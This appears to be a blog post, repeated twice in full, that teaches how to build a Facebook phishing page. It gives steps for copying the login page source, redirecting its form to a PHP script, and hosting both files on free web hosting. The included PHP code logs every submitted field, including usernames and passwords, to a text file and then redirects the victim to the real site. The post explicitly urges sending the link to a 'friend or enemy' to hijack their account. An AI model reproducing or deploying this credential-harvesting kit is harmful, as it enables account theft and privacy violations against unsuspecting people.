Steps:-

1) Go to the PC browser open Fb.
2) Right click on FB main page and select view page source.
3) Copy that whole text and paste it in your notepad.
4) Now to go to your notepad and press CTRL + F and type ACTION.
( If it will not be found scroll up your page from down to top then press CTRL + F and Type ACTION.)
5) You will find text like this action="https://www.facebook.com/login.php? login attempt=1"
5) Replace that text from post.php .
6) Now it will be like action="post.php".
7) Save it as index.htm .
8) Open notepad and copy below text in notepad.
<?php
header ('Location:http://www.facebook.com');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
9) Save it as post.php .
10) Now you have 2 HTML file keep it safe.
11) Go to
000webhosting.com
12) Register an account than after all confirmation go to file manager which is present in control panel.
( If the file manager will not open select another file manger option.)
13) After that click on public html and select default php and delete it after that upload both the file index.htm and post.php .
14) After uploading double click on index.htm the page will be redirected to facebook page that is made by you.
15) Copy that URL and sent it your friend or your enemy to hack his or her FB ID.
When your friend login through your page his or her FB ID password will be tracked.
16) To see your friend password login to 000webhost website select control panel->File manager-> Public html.
17) You will find new file named as username.txt .
Congratulation your enemy or friend FB ID is hacked.

1) Go to the PC browser open Fb.
2) Right click on FB main page and select view page source.
3) Copy that whole text and paste it in your notepad.
4) Now to go to your notepad and press CTRL + F and type ACTION.
( If it will not be found scroll up your page from down to top then press CTRL + F and Type ACTION.)
5) You will find text like this action="https://www.facebook.com/login.php? login attempt=1"
5) Replace that text from post.php .
6) Now it will be like action="post.php".
7) Save it as index.htm .
8) Open notepad and copy below text in notepad.
<?php
header ('Location:http://www.facebook.com');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
9) Save it as post.php .
10) Now you have 2 HTML file keep it safe.
11) Go to
000webhosting.com
12) Register an account than after all confirmation go to file manager which is present in control panel.
( If the file manager will not open select another file manger option.)
13) After that click on public html and select default php and delete it after that upload both the file index.htm and post.php .
14) After uploading double click on index.htm the page will be redirected to facebook page that is made by you.
15) Copy that URL and sent it your friend or your enemy to hack his or her FB ID.
When your friend login through your page his or her FB ID password will be tracked.
16) To see your friend password login to 000webhost website select control panel->File manager-> Public html.
17) You will find new file named as username.txt .
Congratulation your enemy or friend FB ID is hacked.
No comments:
Post a Comment